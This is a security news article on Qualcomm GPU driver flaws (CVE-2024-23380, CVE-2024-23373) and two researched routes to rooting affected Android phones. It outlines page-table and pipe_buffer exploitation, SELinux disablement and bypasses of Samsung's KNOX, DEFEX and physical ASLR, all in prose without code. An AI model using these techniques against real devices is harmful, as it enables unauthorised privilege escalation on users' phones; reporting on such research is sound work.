Two Methods to Root Qualcomm-Based Android Phones

Security researchers have exposed critical vulnerabilities in Qualcomm GPU drivers, impacting a vast array of Android devices from brands like Samsung, Honor, Xiaomi, and Vivo.

These exploits, centered around the GPU Address Fault (GPUAF) primitive, target the kgsl_mem_entry and Virtual Buffer Object (VBO) structures.

By leveraging race conditions and memory management flaws, attackers can achieve root privileges through sophisticated methods involving page Use-After-Free (UaF) vulnerabilities.

Notably, CVE-2024-23380 and CVE-2024-23373 highlight race conditions in VBO mapping and unmapping processes, creating inconsistencies in memory handling that can be chained to devastating effect.

This discovery uncovers a systemic issue in chipset-specific exploits tailored for Qualcomm GPUs, which are widely embedded in flagship devices like the Samsung Galaxy S series (non-Exynos chips) and Xiaomi 14 models.

Dual Exploitation Paths: Page Tables and Pipe Buffers

Delving into the technical depth of these exploits, researchers have devised two potent methodologies to escalate privileges on affected Android systems.

The first method manipulates ARM64 page tables by reclaiming UaF pages through anonymous mappings.

According to the Report, this approach allows attackers to alter page table entries (PTEs), transforming read-only pages into read-write, building physical Arbitrary Address Read/Write (AARW) primitives, and marking memory regions as executable to run arbitrary kernel shellcode.

By calculating fixed kernel image addresses (except on Samsung devices due to physical ASLR), attackers can disable SELinux by overwriting critical structures like selinux_state and hijack the init process via injected shellcode in libc++.so, ultimately spawning a root shell.

The second method targets pipe_buffer structures, reclaiming UaF pages to forge read/write operations.

By manipulating flags like PIPE_BUF_FLAG_CAN_MERGE, attackers can overwrite kernel memory, bypass SELinux, and similarly hijack processes for root access.

Both techniques demonstrate a profound understanding of kernel memory management and GPU driver internals, exploiting aio pages with GFP_HIGHUSER flags as prime targets for reuse in kernel object manipulation.

The sophistication of these exploits extends to bypassing modern Android security mitigations, particularly on Samsung devices fortified with KNOX hypervisor at EL2, DEFEX whitelisting, and enhanced SELinux configurations.

Researchers circumvented these by forging SELinux nodes via AARW in kernel space and injecting libraries into whitelisted user-space processes post-SELinux disablement.

For Samsung’s physical ASLR, attackers employed brute-force checks on _stext instructions or remapped vdso pages to controlled page tables, revealing critical kernel offsets.

Intriguingly, additional methods to extract kernel offsets without firmware access were proposed, leveraging SELinux policies to manipulate file permissions under /data/local/tmp.

This comprehensive attack framework, backed by demos across multiple vendors, underscores the fragility of current GPU driver security and the ingenuity required to exploit it.

The implications are stark: manufacturers must rethink mitigation strategies to align with attacker methodologies, as human-designed defenses prove inadequate against such nuanced, multi-layered attacks on Qualcomm-based Android ecosystems.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!